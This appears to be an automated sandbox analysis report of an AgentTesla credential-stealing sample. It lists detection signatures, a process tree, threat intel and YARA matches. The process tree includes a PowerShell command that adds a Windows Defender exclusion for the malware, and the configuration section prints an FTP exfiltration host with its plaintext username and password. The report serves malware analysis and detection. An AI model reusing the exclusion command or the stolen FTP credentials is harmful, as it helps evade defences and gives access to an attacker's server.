Edit tour

Windows Analysis Report
dhPWt112uC.exe

Overview

General Information

Sample name:	dhPWt112uC.exe renamed because original name is a hash value
Original sample name:	97b6842b7ae2e92619f7001e81705c62395fd8d4a2d5dbfa20b47976aaa3cdd1.exe
Analysis ID:	1589023
MD5:	2327e5c20b3cce0be582dbe461480cc2
SHA1:	42d14ae8b60e22f36f487d8c3bee1ad43199170f
SHA256:	97b6842b7ae2e92619f7001e81705c62395fd8d4a2d5dbfa20b47976aaa3cdd1
Tags:	AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

dhPWt112uC.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\dhPWt112uC.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)

powershell.exe (PID: 7612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7864 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

dhPWt112uC.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\dhPWt112uC.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)

newapp.exe (PID: 8136 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)

newapp.exe (PID: 2260 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)

newapp.exe (PID: 7396 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)

newapp.exe (PID: 7472 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)

newapp.exe (PID: 1196 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)

newapp.exe (PID: 7764 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)

newapp.exe (PID: 5324 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "ben@ercolina-usa.com", "Password": "nXe0M~WkW&nJ"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000F.00000002.4167926761.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.4167926761.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.2008765342.0000000003261000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2008765342.0000000003261000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: dhPWt112uC.exe PID: 7404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dhPWt112uC.exe PID: 7404	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: dhPWt112uC.exe PID: 7404	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: dhPWt112uC.exe PID: 7628	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dhPWt112uC.exe PID: 7628	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: newapp.exe PID: 8136	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: newapp.exe PID: 8136	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: newapp.exe PID: 8136	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: newapp.exe PID: 2260	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: newapp.exe PID: 2260	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: newapp.exe PID: 7396	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: newapp.exe PID: 7396	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: newapp.exe PID: 5324	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: newapp.exe PID: 5324	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.newapp.exe.4271d80.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.newapp.exe.4271d80.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.newapp.exe.4271d80.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35bd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35d6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.newapp.exe.4271d80.4.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x32bec:$s2: GetPrivateProfileString 0x32272:$s3: get_OSFullName 0x33969:$s5: remove_Key 0x33b29:$s5: remove_Key 0x34aa1:$s6: FtpWebRequest 0x359be:$s7: logins 0x35f30:$s7: logins 0x38c41:$s7: logins 0x38cf3:$s7: logins 0x3a7be:$s7: logins 0x3988d:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.dhPWt112uC.exe.3821f18.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.dhPWt112uC.exe.3821f18.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.dhPWt112uC.exe.3821f18.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33bdc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33c4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33cd8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33dd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33e46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33edc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33f6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.dhPWt112uC.exe.3821f18.2.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x30dec:$s2: GetPrivateProfileString 0x30472:$s3: get_OSFullName 0x31b69:$s5: remove_Key 0x31d29:$s5: remove_Key 0x32ca1:$s6: FtpWebRequest 0x33bbe:$s7: logins 0x34130:$s7: logins 0x36e41:$s7: logins 0x36ef3:$s7: logins 0x389be:$s7: logins 0x37a8d:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.dhPWt112uC.exe.37e4cf8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.dhPWt112uC.exe.37e4cf8.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.dhPWt112uC.exe.37e4cf8.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33bdc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33c4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33cd8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33dd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33e46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33edc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33f6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.dhPWt112uC.exe.37e4cf8.3.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x30dec:$s2: GetPrivateProfileString 0x30472:$s3: get_OSFullName 0x31b69:$s5: remove_Key 0x31d29:$s5: remove_Key 0x32ca1:$s6: FtpWebRequest 0x33bbe:$s7: logins 0x34130:$s7: logins 0x36e41:$s7: logins 0x36ef3:$s7: logins 0x389be:$s7: logins 0x37a8d:$s9: 1.85 (Hash, version 2, native byte-order)
10.2.newapp.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.newapp.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.newapp.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35bd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35d6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.newapp.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x32bec:$s2: GetPrivateProfileString 0x32272:$s3: get_OSFullName 0x33969:$s5: remove_Key 0x33b29:$s5: remove_Key 0x34aa1:$s6: FtpWebRequest 0x359be:$s7: logins 0x35f30:$s7: logins 0x38c41:$s7: logins 0x38cf3:$s7: logins 0x3a7be:$s7: logins 0x3988d:$s9: 1.85 (Hash, version 2, native byte-order)
7.2.newapp.exe.3ba2480.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.newapp.exe.3ba2480.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.newapp.exe.3ba2480.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33bdc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33c4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33cd8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33dd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33e46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33edc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33f6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.newapp.exe.3ba2480.3.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x30dec:$s2: GetPrivateProfileString 0x30472:$s3: get_OSFullName 0x31b69:$s5: remove_Key 0x31d29:$s5: remove_Key 0x32ca1:$s6: FtpWebRequest 0x33bbe:$s7: logins 0x34130:$s7: logins 0x36e41:$s7: logins 0x36ef3:$s7: logins 0x389be:$s7: logins 0x37a8d:$s9: 1.85 (Hash, version 2, native byte-order)
7.2.newapp.exe.3b65260.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.newapp.exe.3b65260.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.newapp.exe.3b65260.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33bdc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33c4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33cd8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33dd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33e46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33edc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33f6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.newapp.exe.3b65260.5.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x30dec:$s2: GetPrivateProfileString 0x30472:$s3: get_OSFullName 0x31b69:$s5: remove_Key 0x31d29:$s5: remove_Key 0x32ca1:$s6: FtpWebRequest 0x33bbe:$s7: logins 0x34130:$s7: logins 0x36e41:$s7: logins 0x36ef3:$s7: logins 0x389be:$s7: logins 0x37a8d:$s9: 1.85 (Hash, version 2, native byte-order)
11.2.newapp.exe.4271d80.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.newapp.exe.4271d80.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.newapp.exe.4271d80.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33bdc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33c4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33cd8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33dd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33e46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33edc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33f6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.newapp.exe.4271d80.4.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x30dec:$s2: GetPrivateProfileString 0x30472:$s3: get_OSFullName 0x31b69:$s5: remove_Key 0x31d29:$s5: remove_Key 0x32ca1:$s6: FtpWebRequest 0x33bbe:$s7: logins 0x34130:$s7: logins 0x36e41:$s7: logins 0x36ef3:$s7: logins 0x389be:$s7: logins 0x37a8d:$s9: 1.85 (Hash, version 2, native byte-order)
7.2.newapp.exe.3ba2480.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.newapp.exe.3ba2480.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.newapp.exe.3ba2480.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x729fc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x72a6e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x72af8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x72b8a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35bd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x72bf4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x72c66:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x72cfc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35d6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x72d8c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.newapp.exe.3ba2480.3.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x32bec:$s2: GetPrivateProfileString 0x6fc0c:$s2: GetPrivateProfileString 0x32272:$s3: get_OSFullName 0x6f292:$s3: get_OSFullName 0x33969:$s5: remove_Key 0x33b29:$s5: remove_Key 0x70989:$s5: remove_Key 0x70b49:$s5: remove_Key 0x34aa1:$s6: FtpWebRequest 0x71ac1:$s6: FtpWebRequest 0x359be:$s7: logins 0x35f30:$s7: logins 0x38c41:$s7: logins 0x38cf3:$s7: logins 0x3a7be:$s7: logins 0x729de:$s7: logins 0x72f50:$s7: logins 0x75c61:$s7: logins 0x75d13:$s7: logins 0x777de:$s7: logins 0x3988d:$s9: 1.85 (Hash, version 2, native byte-order)
7.2.newapp.exe.3b65260.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.newapp.exe.3b65260.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.newapp.exe.3b65260.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x72bfc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xafc1c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x72c6e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xafc8e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x72cf8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xafd18:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x72d8a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xafdaa:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35bd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x72df4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xafe14:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x72e66:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xafe86:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x72efc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xaff1c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
7.2.newapp.exe.3b65260.5.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x32bec:$s2: GetPrivateProfileString 0x6fe0c:$s2: GetPrivateProfileString 0xace2c:$s2: GetPrivateProfileString 0x32272:$s3: get_OSFullName 0x6f492:$s3: get_OSFullName 0xac4b2:$s3: get_OSFullName 0x33969:$s5: remove_Key 0x33b29:$s5: remove_Key 0x70b89:$s5: remove_Key 0x70d49:$s5: remove_Key 0xadba9:$s5: remove_Key 0xadd69:$s5: remove_Key 0x34aa1:$s6: FtpWebRequest 0x71cc1:$s6: FtpWebRequest 0xaece1:$s6: FtpWebRequest 0x359be:$s7: logins 0x35f30:$s7: logins 0x38c41:$s7: logins 0x38cf3:$s7: logins 0x3a7be:$s7: logins 0x72bde:$s7: logins
0.2.dhPWt112uC.exe.3821f18.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.dhPWt112uC.exe.3821f18.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.dhPWt112uC.exe.3821f18.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.dhPWt112uC.exe.3821f18.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x729fc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x72a6e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x72af8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x72b8a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35bd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x72bf4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x72c66:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x72cfc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35d6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x72d8c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.dhPWt112uC.exe.3821f18.2.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x32bec:$s2: GetPrivateProfileString 0x6fc0c:$s2: GetPrivateProfileString 0x32272:$s3: get_OSFullName 0x6f292:$s3: get_OSFullName 0x33969:$s5: remove_Key 0x33b29:$s5: remove_Key 0x70989:$s5: remove_Key 0x70b49:$s5: remove_Key 0x34aa1:$s6: FtpWebRequest 0x71ac1:$s6: FtpWebRequest 0x359be:$s7: logins 0x35f30:$s7: logins 0x38c41:$s7: logins 0x38cf3:$s7: logins 0x3a7be:$s7: logins 0x729de:$s7: logins 0x72f50:$s7: logins 0x75c61:$s7: logins 0x75d13:$s7: logins 0x777de:$s7: logins 0x3988d:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
